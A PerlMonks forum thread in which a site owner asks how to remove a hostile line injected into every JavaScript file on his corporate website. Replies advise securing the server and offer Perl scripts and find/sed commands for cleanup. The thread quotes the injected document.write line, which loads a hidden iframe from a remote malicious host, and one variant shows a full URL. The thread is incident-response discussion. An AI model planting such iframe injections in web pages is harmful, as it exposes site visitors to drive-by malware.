Hacking of JavaScript files in our corporate website

by shajiindia (Acolyte)
on Dec 16, 2012 at 14:32 UTC

shajiindia has asked for the wisdom of the Perl Monks concerning the following question:

Dear Monks,

In our corporate website there was an attempted hack and all the .js files were hacked. The following lines were added to all .js files. (Some information stripped out for security reasons.)

;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http : / / ipxlqfn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8"></iframe>');

We cleared out all the lines manually, now again the same thing happened. The question is how can we automate removing all the newly added lines into the .js files from all directories in the web server.

Following are my questions

  1. How can we delete the above lines without shutting down the web server?
  2. How to automate the process of removing these newly added lines in case the same thing happens again?
  3. Are there any other tools available to painlessly remove such things from a live server?

Any other tips, suggestions and advice will be of immense help.

Please help.

Replies are listed 'Best First'.
Re: Hacking of JavaScript files in our corporate website
by tobyink (Canon) on Dec 16, 2012 at 15:00 UTC

    A man keeps breaking into my house and taking a crap in my toilet and then leaving without flushing. How can I use Perl to automate flushing the toilet?

    Hey, how about instead of automating flushing the toilet I figure out how he's getting into the house in the first place and try to stop that happening?

    perl -E'sub Monkey::do{say$_,for@_,do{($monkey=[caller(0)]->[3])=~s{::}{ }and$monkey}}"Monkey say"->Monkey::do'
Re: Hacking of JavaScript files in our corporate website
by flexvault (Monsignor) on Dec 16, 2012 at 14:53 UTC

    shajiindia,

    IMHO, you should be doing something to fix the problem;

      Why are you letting someone modify your live web-site?

    Check the logs, close the exposure holes, etc. Then fix the code and don't let it happen again.

    I've been hacked, and it isn't fun, but I fixed the source of the problem.

    First, all of your JavaScript files should be read-only. Look at everything, since there may be other compromised files.

    To answer your question, a very simple Perl script run every hour could check the modified JS to a checksum and if it fails to verify, then notify the sysadmin. But if the site is that un-secure, then maybe *they* could modify your Perl script!

    Good Luck...Ed

    "Well done is better than well said." - Benjamin Franklin

      Thanks for your help.
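
The hourly checksum check suggested in the reply above, sketched as an added example (not code from any poster in this thread). It uses only core modules and runs on a constructed temporary tree; the file names and the placeholder URL are assumptions, and a real job would store the baseline outside the web root under a different account, since an attacker who can write to the site could otherwise rewrite it.

```perl
use strict;
use warnings;
use File::Find;
use File::Temp qw(tempdir);
use Digest::SHA;

# Return { path => SHA-256 hex digest } for every .js file under $root.
sub hash_tree {
    my ($root) = @_;
    my %sum;
    find({ no_chdir => 1, wanted => sub {
        return unless -f $_ && /\.js\z/i;
        $sum{$_} = Digest::SHA->new(256)->addfile($_, 'b')->hexdigest;
    } }, $root);
    return \%sum;
}

# Compare a current scan with the baseline; return one alert line per change.
sub diff_tree {
    my ($known, $current) = @_;
    my @alerts;
    for my $path (sort keys %$current) {
        if    (!exists $known->{$path})              { push @alerts, "NEW      $path" }
        elsif ($known->{$path} ne $current->{$path}) { push @alerts, "MODIFIED $path" }
    }
    push @alerts, "MISSING  $_" for grep { !exists $current->{$_} } sort keys %$known;
    return @alerts;
}

# Constructed demo tree (not real site data): two clean files.
my $root = tempdir(CLEANUP => 1);
for my $name (qw(menu.js form.js)) {
    open my $fh, '>', "$root/$name" or die "Cannot write $name: $!";
    print {$fh} "function init() { return 1; }\n";
    close $fh or die "Cannot close $name: $!";
}
my $baseline = hash_tree($root);   # taken while the tree is known to be clean

# Simulate the incident: one file gets a line appended, one file is dropped in.
open my $fh, '>>', "$root/menu.js" or die "Cannot append: $!";
print {$fh} ";document.write('<iframe src=\"http://placeholder.invalid/\"></iframe>');\n";
close $fh or die "Cannot close: $!";
open $fh, '>', "$root/extra.js" or die "Cannot write: $!";
close $fh or die "Cannot close: $!";

my @alerts = diff_tree($baseline, hash_tree($root));
print "$_\n" for @alerts;          # a scheduled job would mail these to the sysadmin
exit(@alerts ? 1 : 0);             # non-zero exit lets the scheduler flag the run
```

Reporting new and missing files as well as modified ones matters here, because a compromise that can append to every .js file can also create files.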
Re: Hacking of JavaScript files in our corporate website
by marto (Cardinal) on Dec 16, 2012 at 17:51 UTC

    The first time you reported this happening I suggested you secure the system and restore the site from backup. At the time you had no backup, clearly you've not learned anything from the first attack.

    You're wasting your time if the system isn't secured by someone who knows what they're doing. This probably isn't you.

Re: Hacking of JavaScript files in our corporate website
by RichardK (Parson) on Dec 16, 2012 at 15:19 UTC

    After you've fixed your security problems, just reload the scripts from version control :) (You are using version control aren't you?)

Re: Hacking of JavaScript files in our corporate website
by CountZero (Bishop) on Dec 17, 2012 at 07:33 UTC
    After having secured the web-server, so it won't happen again, you can use File::Find::Rule and its methods start and match to iterate over all the JavaScript files. For each such file found, you then open the file, slurp it into an array and loop over the array, deleting any of the "bad" lines and write it again to the JavaScript file. File::Slurp can assist you here: it has the useful functions edit_file or edit_file_lines which do an easy in-place edit.

    CountZero

    "A program should be light and agile, its subroutines connected like a string of pearls. The spirit and intent of the program should be retained throughout. There should be neither too little or too much, neither needless loops nor useless variables, neither lack of structure nor overwhelming rigidity." - The Tao of Programming, 4.1 - Geoffrey James

    My blog: Imperial Deltronics
      I am burning the midnight oil to fix it. Thanks for your kind help. It is greatly appreciated.

        Here is the code I am working on. It works for sample data, but for the actual data, it is not working. I am working on the backup of the live files and presently using the following script. I am working on Active Perl 5.14 on Windows. Please help.

        #!/usr/bin/perl
        use strict;

        # show no warnings about recursion (we know what we do)
        no warnings "recursion";

        # specify the file you search here (in this example "corporate"):
        my $file = '\.js$';
        my @jsfiles = ();

        # specify the directory where you want to start the search
        # (in this example ".", the current directory):
        my $searchdir = "C:/scripts/corporate";
        my $replace_string = "SAMPLE TEXT TO REPLACE";

        # Calling the subroutine, which searches the file
        readDirectory($searchdir, $file);

        print "\n", '*' x 60, "\n";
        foreach my $js (@jsfiles) {
            open JAVASCRIPT, '<', "$js" or die "Cannot open file for read ($!)";
            open TEMP, '>', "temp.js" or die "Cannot open file for write ($!)";
            # Enable slurp mode
            local $/;
            my $data = <JAVASCRIPT>;
            $data =~ s/$replace_string//g;
            print TEMP $data;
            close JAVASCRIPT;
            close TEMP;
            unlink $js;
            rename "temp.js", $js;
            print "$js\n";
        }
        print "\n", '*' x 60, "\n";

        # We need a subroutine, which can be called on every sub-directory
        sub readDirectory {
            my $searchdir  = shift;
            my $searchfile = shift;

            # a little bit of output, in which directory the script
            # is searching at the moment (the following line is not necessary)
            print "Searching in $searchdir \n";

            # Open and close the directory
            opendir DIR, $searchdir or die("An error occured: $!");
            my @files = readdir(DIR);
            closedir DIR;

            foreach my $currentFile (@files) {
                # In Unix/Linux we have the directories "." and "..",
                # it's no good idea to scan these, so let them skip.
                next if $currentFile =~ /^\./;

                # Let's have a look, if the current "file" is the searched file,
                # else have a look, if the "file" is a directory,
                # and if it's one, let's have a look, if the searched file is into it.
                if ( $currentFile =~ /$searchfile/ ) {
                    # We found the right file, now we can do something with it,
                    # in this case, we only print a text
                    push @jsfiles, "$searchdir/$currentFile";
                    print "Found the file: $searchdir/$currentFile\n";
                }
                if ( -d "$searchdir/$currentFile" ) {
                    # The subroutine is calling itself with the new parameters
                    readDirectory("$searchdir/$currentFile", $searchfile);
                }
            }
        }

        Here is a code signature of the hacked .js files

        ;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http : / / ipxlqfn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8"></iframe>');

        I want to make the above code to get replaced instead of the sample pattern.
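
An added example, not code from any poster in this thread, for the in-place cleanup discussed in this sub-thread. The signature contains regex metacharacters such as ( ) . and ?, so it has to be quoted with \Q...\E before it can be used where the script above has $replace_string; the block also shows a bounded structural pattern for cases where the URL differs between files. It uses core modules in place of File::Find::Rule and File::Slurp, and the placeholder URL, the sample files and the .infected and .tmp suffixes are assumptions.

```perl
use strict;
use warnings;
use File::Find;
use File::Temp qw(tempdir);
use File::Copy qw(copy);

# Literal signature as it would appear in a file. The URL is a constructed placeholder.
my $signature = q{;document.write('<iframe width="50" height="50" src="http://placeholder.invalid/x.cgi?8"></iframe>');};

# \Q...\E escapes ( ) . ? so the signature is matched as text, not as a regex.
my $literal = qr/\Q$signature\E/;
# Structural variant: one document.write of one iframe, bounded by [^']* so it
# cannot run past the closing quote into legitimate code on the same line.
my $structural = qr/;?document\.write\('<iframe\b[^']*<\/iframe>'\);/;

# Remove matches from one file, keeping the original as evidence. Returns hit count.
sub clean_file {
    my ($path, $re) = @_;
    open my $in, '<:raw', $path or die "Cannot read $path: $!";
    my $data = do { local $/; <$in> };
    close $in;
    my $hits = () = $data =~ /$re/g;
    return 0 unless $hits;
    copy($path, "$path.infected") or die "Cannot back up $path: $!";
    (my $clean = $data) =~ s/$re//g;
    open my $out, '>:raw', "$path.tmp" or die "Cannot write $path.tmp: $!";
    print {$out} $clean;
    close $out or die "Cannot close $path.tmp: $!";
    rename "$path.tmp", $path or die "Cannot replace $path: $!";
    return $hits;
}

# Constructed sample tree: one infected minified file, one clean file.
my $root = tempdir(CLEANUP => 1);
my %sample = ('a.js' => "var a=1;$signature" . "var b=2;\n", 'b.js' => "var c=3;\n");
for my $name (keys %sample) {
    open my $fh, '>:raw', "$root/$name" or die "Cannot write $name: $!";
    print {$fh} $sample{$name};
    close $fh or die "Cannot close $name: $!";
}

find({ no_chdir => 1, wanted => sub {
    return unless -f $_ && /\.js\z/i;
    my $hits = clean_file($_, $structural);   # or $literal for an exact match
    print "$_: removed $hits injected statement(s)\n" if $hits;
} }, $root);
```

The .infected copies preserve modification times and content for the log review recommended elsewhere in the thread; move them out of the web root once collected.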

Re: Hacking of JavaScript files in our corporate website
by Anonymous Monk on Dec 16, 2012 at 18:58 UTC
    surely corporate lawyer would advise against bandaid :)
Re: Hacking of JavaScript files in our corporate website
by Anonymous Monk on Jan 13, 2013 at 04:03 UTC

    Hello all, I faced exactly the same problem: I think there is a problem with my hoster -- not from my ftp access for sure ...

    The code has infected all my JS files on my server (I have 1000+ JS files).

    To remove the bad code from the JS files I did the following (shell command line):

    1) List all the infected files:

        find . -name "*.js" -exec grep -l -E 'iframe' {} \; > file_js.txt

    Which means: find all the JavaScript files below my directory, search them for the string "iframe", and put all the selected files in the file_js.txt document.

    2) Open one of the files selected in 1, go to the bottom of the file and verify that you have this type of iframe code:

        document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/235e4e002c.pjH7gYIk?default" height="55" width="55"></iframe>');

    3) Remove this code in all files -- the magic command line (test it before on one or two copied files...):

        find . -name "*.js" -type f -exec sed -i -e "s/document.write.*wikaba.*//g" {} \;

    Which means: find all JS files below my directory, then replace inside these files the string beginning with "document.write", having multiple characters, then having the string "wikaba", then finishing with many other characters. You replace it with nothing.

    And that does the trick! Hope it could help.

      Unless you fix the root cause of the problem you'll likely be hit again, as was the case with this user.
